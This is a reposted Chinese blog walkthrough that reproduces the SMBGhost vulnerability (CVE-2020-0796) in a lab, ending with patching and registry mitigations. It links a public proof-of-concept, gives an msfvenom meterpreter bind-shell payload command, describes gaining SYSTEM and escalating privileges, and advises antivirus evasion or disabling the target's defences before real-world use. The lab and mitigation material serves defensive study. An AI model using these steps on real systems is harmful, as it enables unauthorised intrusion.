码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2020-0796——SMBV3客户端/服务端远程代码执行漏洞(远程代码执行+权限提升)

时间:2020-06-27 13:28:26      阅读:134      评论:0      收藏:0      [点我收藏+]

标签:html   href   sky   item   ble   span   xpl   user   操作   

0X00  漏洞简介:

   Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。CVE-2020-0796是存在于微软服务器消息块3.0 (SMBv3)协议中的蠕虫级漏洞,微软安全中心在北京时间3月12日23时发布了影响Windows 10 等系统用户的SMBv3远程代码执行漏洞补丁。
        受影响的用户建议尽快按照微软更新信息指南安装该补丁: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796。简单点说,该漏洞属于高危的零接触远程代码执行漏洞,同时又可以用来提升权限。
 

0X01  影响版本: 

  Windows 10 Version 1903 for 32-bit Systems
  Windows 10 Version 1903 for ARM64-based Systems
  Windows 10 Version 1903 for x64-based Systems
  Windows 10 Version 1909 for 32-bit Systems
  Windows 10 Version 1909 for ARM64-based Systems
  Windows 10 Version 1909 for x64-based Systems
  Windows Server, version 1903 (Server Core installation)
  Windows Server, version 1909 (Server Core installation)

 

0X02  复现环境:

   靶机:win10 1903 x64 专业版    
        攻击机:kali 2019.4
 

0X03  漏洞检测:

    这里使用的是奇安信的检测工具,
         文件下载地址:http://dl.qianxin.com/skylar6/CVE-2020-0796scanner.zip
         版本号:1.0.0.1001
         MD5: AA007E57DAAF2D64247FC41EA8A997F4
         SHA1: 15B49C05066F5894D254FDD5B3DB126B9D1D2AB9
         SHA256: 067B6E17E5F3D9EC070FEF304B57A3F4F7446356231179C573D004AA931262A3       
        使用方法如下:
技术图片

 

0X04  复现:

  1、远程代码执行:

    exp项目地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

    生成payload:msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -b ‘\x00‘ -i 1 -f python  

  技术图片

     替换exploit.py中的内容:

技术图片

      替换的时候,要保留USER_PAYLOAD字段。

      设置msf监听:

技术图片

    运行exploit:

技术图片    

技术图片

    简单总结:在使用远程命令执行以后获得的shell是system权限,无需提权。

    2、权限提升: 

    创建一个普通用户并查看权限:

技术图片

 

技术图片

    执行exp:

技术图片   

    执行完exp以后会弹出一个管理员权限的命令行,但是确实system权限:

技术图片

正常情况下应该如下:

技术图片

  到这里就说明我们提权成功了,需要提一点的是,这个需要新建用户才能提权。还有就是这个很容易被杀掉,在实战用之前,建议对exp做免杀处理或者直接关掉目标的防火墙以及病毒和威胁防护,还有就是第三方杀软了。

0X05  加固方案:

  1、按照微软更新信息指南安装该补丁,链接如下:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
        2、设置->更新和安全->Windows更新,点击“检查更新”。以此来完成补丁的安装,但是不建议这么做,因为win10有时候会推一些有点很烦人的功能,反而会降低win10的可靠性,导致电脑死机。
        3、对SMB通信445端口进行封禁。
        4、禁用SMB压缩服务:Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 –Force
 
0X06  参考文章:

  https://mp.weixin.qq.com/s/WR3QBp9WNep_sxrNAusCLg
  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
  https://blogs.360.cn/post/CVE-2020-0796.html

CVE-2020-0796——SMBV3客户端/服务端远程代码执行漏洞(远程代码执行+权限提升)

标签:html   href   sky   item   ble   span   xpl   user   操作   

原文地址:https://www.cnblogs.com/sq-smile/p/13198049.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!